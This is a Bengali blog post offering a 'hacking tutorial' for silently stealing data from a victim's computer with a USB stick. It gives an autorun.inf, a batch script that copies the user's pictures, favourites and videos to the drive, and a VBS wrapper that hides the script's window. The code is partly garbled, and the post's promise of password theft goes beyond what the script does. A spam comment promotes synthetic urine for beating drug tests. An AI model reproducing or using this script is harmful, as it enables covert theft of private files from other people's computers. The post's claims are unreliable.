পেনড্রাইভ দিয়ে কম্পিউটারে সব কিছু হ্যাক করুন! - Hacking Tutorial


পেনড্রাইভ দিয়ে কম্পিউটারে সব কিছু হ্যাক করুন! 

আজ আমি এই পোস্টে আপনাদের দেখাবো যে কোনো কম্পিউটারের পাসওয়ার্ড সহ সব গোপন তথ্য কিভাবে হাতিয়ে নেয়া যায়। শুধুমাত্র ভিক্টিমের কম্পিউটারে আপনার পেনড্রাইভ ঢুকিয়ে বের করলেই হবে, আপনাকে আর কিছুই করতে হবে না। তার আগে আপনার পেনড্রাইভে কিছু কাজ করে রাখতে হবে। তো চলুন দেখে নিই কি কাজ করে রাখতে হবে। তবে এই পোষ্টের নিচের অংশে যাওয়ার আগে এই কথাগুলো খুব মনোযোগ সহকারে শুনুন, কখনোই কারো ক্ষতি করার উদ্দেশ্যে এই পদ্ধতিগুলো ব্যবহার করবেন না। শুধুমাত্র জানার জন্য এবং শেখার জন্য এই পোস্টগুলো করা হয়। এই পোস্ট গুলোর মাধ্যমে অর্জিত জ্ঞান দ্বারা যদি আপনারা কারো কোন ধরনের ক্ষতি করেন, তার দায়দায়িত্ব আমি সবুজ বা আমার গ্রুপ সবুজ বাংলা ইউটিউব হেল্পলাইন কখনই কোনভাবে নেবে না।
আপনাদের ৪ টি ফাইল বানাতে হবে।
তো চলুন বানিয়ে ফেলি, কি ভয় পাচ্ছেন!!  তেমন কিছু না শুধু নোটপ্যাড ওপেন করুন আর আমার দেওয়া কোড কপি করে নোটপ্যাডে paste করবেন।
১ম ফাইল
নিচের কোডটি কপি করে নোটপ্যাডে পেস্ট করুন।
[autorun]
icon=drive.ico open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
এবার ফাইলটিকে autorun.inf নামে সেভ করুন।
২য় ফাইল
নিচের কোডটি কপি করে নোটপ্যাডে পেস্ট করুন।
@echo off
:: variables /min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /
e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE% \pictures””%drive%\Data\My
pics”
%backupcmd% “%USERPROFILE%
\Favorites” “%drive%\Data
\Favorites”
%backupcmd% “%USERPROFILE% \videos””%drive%\Data\vids”
@echo off
cls
এবার এটাকে File.bat নামে সেভ করুন।
৩য় ফাইল
আবার নোটপ্যাড ওপেন করে নিচের কোড কপি করে পেস্ট করুন।
CreateObject(“Wscript.Shell”). Run “””” & WScript.Arguments(0)
& “”””,0, False
এটিকে Invisible.vbs নামে সেভ করুন।
৪র্থ ফাইল
কোডটি কপি করে নোটপ্যাডে পেস্ট করুন।
wscript.exe \invisible.vbs file.bat
এবার এটাকে Launch.bat নামে সেভ করুন।
ব্যাস আমাদের ফাইল ক্রিয়েট কম্পলিট। এবার পেনড্রাইভে নিউ ফোল্ডার নিয়ে গিয়ে Data নামে সেভ করুন এবং তার ভিতর উক্ত ০৪টি ফাইল রাখুন। পেনড্রাইভের কাজ শেষ, এবার যে কম্পিউটারে পেনড্রাইভ ঢুকিয়ে বের করবেন, সেই কম্পিউটারের তথ্য পেয়ে যাবেন। পোস্টটি ভাল লাগলে একটা লাইক দিন এবং কমেন্ট করুন। কোন সমস্যা হলে বলবেন যথাসাধ্য সাহায্য করার চেষ্টা করবো। ইনশাআল্লাহ।  আরো বিস্তারিত জানতে আমার ইউটিউব চ্যানেলটি সাবস্ক্রাইব করে সাথে থাকুন।


ফোন হ্যাক হয়েছে কিনা কিভাবে বুঝবেন,গুগলে নাম্বার সেভ করার নিয়ম,হ্যাক,কপি করুন,যতখুশি অ্যাপ ইন্সটল করার নতুন ৫টি পদ্ধতি,অ্যাপ install করলেই ফোন মেমরি full দেখায় কেন,গুগল ড্রাইভ কিভাবে ব্যবহার করব,#পেন_ড্রাইভ_রিকোভারী,কিভাবে মোবাইল দিয়ে গুগল ড্রাইভ ব্যবহার করব,প্রেমিকার গ্যালারি,usb killer device টা কি ভাবে কাজ করে,ফেসবুকের ভিডিও ডাউনলোড করার উপায়,গ্যালারি ছবি,কপি করার সহয উপায়,google drive কিভাবে ব্যবহার করতে হয়,প্যাটান লক খোলার নিয়মফোন হ্যাক হয়েছে কিনা কিভাবে বুঝবেন,গুগলে নাম্বার সেভ করার নিয়ম,হ্যাক,কপি করুন,যতখুশি অ্যাপ ইন্সটল করার নতুন ৫টি পদ্ধতি,অ্যাপ install করলেই ফোন মেমরি full দেখায় কেন,গুগল ড্রাইভ কিভাবে ব্যবহার করব,#পেন_ড্রাইভ_রিকোভারী,কিভাবে মোবাইল দিয়ে গুগল ড্রাইভ ব্যবহার করব,প্রেমিকার গ্যালারি,usb killer device টা কি ভাবে কাজ করে,ফেসবুকের ভিডিও ডাউনলোড করার উপায়,গ্যালারি ছবি,কপি করার সহয উপায়,google drive কিভাবে ব্যবহার করতে হয়,প্যাটান লক খোলার নিয়ম
Next Post Previous Post
1 Comments

You cannot comment with a link / URL. If you need backlinks then you can guest post on our site with only 5$. Contact

  • Unknown
    Unknown October 28, 2021 at 10:31 AM

    This concoction duplicates the essential chemical and visual properties of urine biologically produced by humans. It is typically made up of urea, uric acid, creatinine, and other such compounds. Synthetic urine is becoming an increasingly popular and in-demand product. This demand is not just for passing drug tests anymore. Drug testing centers today also use fake urine to test their equipment. It can also be used to test the impact of urine on domestic products like cleaning agents and diapers. There are essentially two types of synthetic urine – liquid and powdered. Liquid synthetic urine comes in concentrated liquid form. With the powdered form, the synthetic urine is made by mixing water with the dehydrated urine powder. Both are the same in terms of their components. The main difference lies in the fact that you are responsible for adding water to the powder for the final synthetic urine. This may be an inconvenience to some. You have to take 15 pills of Toxin Rid daily (taking …

Add Comment
comment url

Footer Ads